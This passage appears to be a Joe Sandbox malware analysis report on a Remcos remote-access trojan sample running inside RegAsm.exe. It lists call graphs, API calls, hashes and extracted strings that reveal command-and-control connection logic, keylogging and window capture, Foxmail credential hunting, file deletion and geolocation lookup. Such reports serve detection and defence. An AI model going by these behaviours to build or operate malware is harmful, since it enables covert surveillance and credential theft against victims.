                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                  • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-UCDCW8$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                  • API String ID: 2830904901-58659829
                                                                                  • Opcode ID: c473a0e6ab6558ef37c769e004aef5e6396991bf3222f738dbda1abcd0da3e91
                                                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                  • Opcode Fuzzy Hash: c473a0e6ab6558ef37c769e004aef5e6396991bf3222f738dbda1abcd0da3e91
                                                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 612 415220-415246 call 402093 * 2 call 41b580 606->612 613 41524b-415260 call 404f51 call 4048c8 606->613 630 415ade-415af0 call 404e26 call 4021fa 607->630 612->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 613->629 613->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 643 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->643 644 415b18-415b20 call 401e8d 630->644 643->644 644->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-415532 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c 695->702 701->702 737 415537-415a51 call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->737 948 415a53-415a5a 737->948 949 415a65-415a6c 737->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                  • String ID: | $%I64u$5.1.3 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-UCDCW8$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                  • API String ID: 524882891-3370627255
                                                                                  • Opcode ID: f66ca5bd8b63626b63fa5358b931a5f4cef91eec4a02a828c9394f1940249b47
                                                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                  • Opcode Fuzzy Hash: f66ca5bd8b63626b63fa5358b931a5f4cef91eec4a02a828c9394f1940249b47
                                                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1093 412e43-412e5f call 401f04 call 41c516 1091->1093 1092->1093 1100 412e61-412e73 call 401f04 DeleteFileW 1093->1100 1101 412e79-412e7b 1093->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1137 412eff 1123->1137 1137->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BAD8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                                                  • API String ID: 1223786279-2576077980
                                                                                  • Opcode ID: af441012297096c8b43541b193aaac9c6215345eb82ce5568c811fdace51d69e
                                                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                  • Opcode Fuzzy Hash: af441012297096c8b43541b193aaac9c6215345eb82ce5568c811fdace51d69e
                                                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                  • API String ID: 672098462-2938083778
                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                  • API String ID: 3795512280-1152054767
                                                                                  • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                  • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1384 4048c8-4048e8 connect 1385 404a1b-404a1f 1384->1385 1386 4048ee-4048f1 1384->1386 1389 404a21-404a2f WSAGetLastError 1385->1389 1390 404a97 1385->1390 1387 404a17-404a19 1386->1387 1388 4048f7-4048fa 1386->1388 1391 404a99-404a9e 1387->1391 1392 404926-404930 call 420cf1 1388->1392 1393 4048fc-404923 call 40531e call 402093 call 41b580 1388->1393 1389->1390 1394 404a31-404a34 1389->1394 1390->1391 1406 404941-40494e call 420f20 1392->1406 1407 404932-40493c 1392->1407 1393->1392 1396 404a71-404a76 1394->1396 1397 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1394->1397 1399 404a7b-404a94 call 402093 * 2 call 41b580 1396->1399 1397->1390 1399->1390 1419 404950-404973 call 402093 * 2 call 41b580 1406->1419 1420 404987-404992 call 421ad1 1406->1420 1407->1399 1446 404976-404982 call 420d31 1419->1446 1431 4049c4-4049d1 call 420e97 1420->1431 1432 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1420->1432 1442 4049d3-4049f6 call 402093 * 2 call 41b580 1431->1442 1443 4049f9-404a14 CreateEventW * 2 1431->1443 1432->1446 1442->1443 1443->1387 1446->1390
                                                                                  APIs
                                                                                  • connect.WS2_32(FFFFFFFF,00A7EAA8,00000010), ref: 004048E0
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                  • API String ID: 994465650-2151626615
                                                                                  • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                  • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 3658366068-0
                                                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                  • API String ID: 911427763-3954389425
                                                                                  • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                  • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1556 40da6f-40da94 call 401f86 1559 40da9a 1556->1559 1560 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1556->1560 1561 40dae0-40dae7 call 41c048 1559->1561 1562 40daa1-40daa6 1559->1562 1563 40db93-40db98 1559->1563 1564 40dad6-40dadb 1559->1564 1565 40dba9 1559->1565 1566 40db9a-40db9f call 43c11f 1559->1566 1567 40daab-40dab9 call 41b645 call 401f13 1559->1567 1568 40dacc-40dad1 1559->1568 1569 40db8c-40db91 1559->1569 1582 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1561->1582 1583 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1561->1583 1571 40dbae-40dbb3 call 43c11f 1562->1571 1563->1571 1564->1571 1565->1571 1578 40dba4-40dba7 1566->1578 1590 40dabe 1567->1590 1568->1571 1569->1571 1584 40dbb4-40dbb9 call 409092 1571->1584 1578->1565 1578->1584 1595 40dac2-40dac7 call 401f09 1582->1595 1583->1590 1584->1560 1590->1595 1595->1560
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LongNamePath
                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                  • API String ID: 82841172-425784914
                                                                                  • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                  • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1671 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1676 41b456-41b477 InternetReadFile 1671->1676 1677 41b479-41b499 call 4020b7 call 403376 call 401fd8 1676->1677 1678 41b49d-41b4a0 1676->1678 1677->1678 1679 41b4a2-41b4a4 1678->1679 1680 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1678->1680 1679->1676 1679->1680 1685 41b4b8-41b4c2 1680->1685
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                  Strings
                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                  • API String ID: 3121278467-91888290
                                                                                  • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                  • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
